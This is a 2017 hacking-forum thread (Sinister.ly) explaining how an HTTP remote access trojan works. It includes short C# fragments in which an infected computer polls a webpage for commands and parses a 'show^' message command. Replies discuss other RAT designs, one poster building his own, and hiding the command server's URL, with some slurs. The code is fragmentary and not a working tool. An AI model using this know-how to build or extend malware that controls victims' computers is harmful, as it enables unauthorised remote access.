+- Sinisterly (https://sinister.ly)
+-- Forum: Design (https://sinister.ly/Forum-Design)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials--78)
+--- Thread: Tutorial RATs (/Thread-Tutorial-RATs)
RATs - zenith - 01-09-2017
**DISCLAIMER** For all the kiddos out there, this explanation goes over what an HTTP RAT is. There are different types. But this goes over one of them.
A lot of people are confused about RATs and how they work. This is not a coding tutorial. This is a thread to explain the Remote Administrator Tool (RAT).
The main principle of the RAT is this: There's an application running on the target's computer. That application is waiting for data from a server, and you write that data using your client. Most people think writing a server is hard, but it's really not. Your client is writing data to a "webpage" hosted by a server. The app on the target's computer is constantly downloading data from this "webpage" usingÂ
Code:
string command = Webclient.DownloadString(webpage address here);The command received from the server is stored on the variable "command"
Then, in a while statement, the app running on the infected computer is checking for a valid command.
Or, if you want to send them a message, you can just split the command string value like so:
Code:
string[] data //You create a array of strings so you can store the string behind and after the decided sign.
command = command.TrimStart();
command = command.TrimEnd();
//Now you can check for the command:
if (command.StartsWith("show")){
data = command.Split('^'); //now data[0]=What's behind the ^ sign and data[1]=What's after the ^ sign
MessageBox.Show(data[1]);
}So, if I give the command "show^Hello!", the infected computer will display "Hello!".
RE: RATs - Bish0pQ - 01-10-2017
Interesting for people that don't know anything about RAT's and how they work. Nice thread, keep it up.
There's a redundant "[/quote]", just thought I'd mention that real quick. Thank you for sharing!
RE: RATs - dosj24 - 01-29-2017
awesome explanation
peace
RE: RATs - Mafia - 03-09-2017
Nice explanation, however I think this is known as a HTTP RAT if it's using a web page? Also if someone decompiles your malware they can find the URL pretty easily. I am still a fan of standard RAT's which aren't reliant on a web server, also for the fact I dislike PHP. Correct me if I'm wrong. But my RAT I am working on doesn't require any web pages, only the client and the server (done in C#).
RE: RATs - protonrotuing - 03-13-2017
op there will be some idiots who don't know what type of rat you're talking about please specify or write more tutorials for http rats, java rats, etx
RE: RATs - Aeolian - 03-14-2017
(03-09-2017, 11:51 AM)Mafia Wrote: Nice explanation, however I think this is known as a HTTP RAT if it's using a web page? Also if someone decompiles your malware they can find the URL pretty easily. I am still a fan of standard RAT's which aren't reliant on a web server, also for the fact I dislike PHP. Correct me if I'm wrong. But my RAT I am working on doesn't require any web pages, only the client and the server (done in C#).
They can, but most people are retarded.
RE: RATs - zenith - 03-14-2017
(03-14-2017, 06:13 AM)Aeolian Wrote:(03-09-2017, 11:51 AM)Mafia Wrote: Nice explanation, however I think this is known as a HTTP RAT if it's using a web page? Also if someone decompiles your malware they can find the URL pretty easily. I am still a fan of standard RAT's which aren't reliant on a web server, also for the fact I dislike PHP. Correct me if I'm wrong. But my RAT I am working on doesn't require any web pages, only the client and the server (done in C#).
They can, but most people are retarded.
Trade off to that though is that it's extremely easy to find out who made the RAT
I remember one kid spreading his RAT like wildfire. Someone wiresharked it (I think this is what I've heard) and found his ip. Called the kids ISP and got him kicked off it.
Fun day.
RE: RATs - CleanZombie - 04-20-2017
Hey thanks for the interesting post, any more about this to come?
RE: RATs - Num5kull - 04-20-2017
most server http addresses are found in every trojan easily apart from things like Zeus that encrypts the config. But even then a http proxy or any number of tools can fetch them. Its having hosting and good secure code that makes it work
Great post !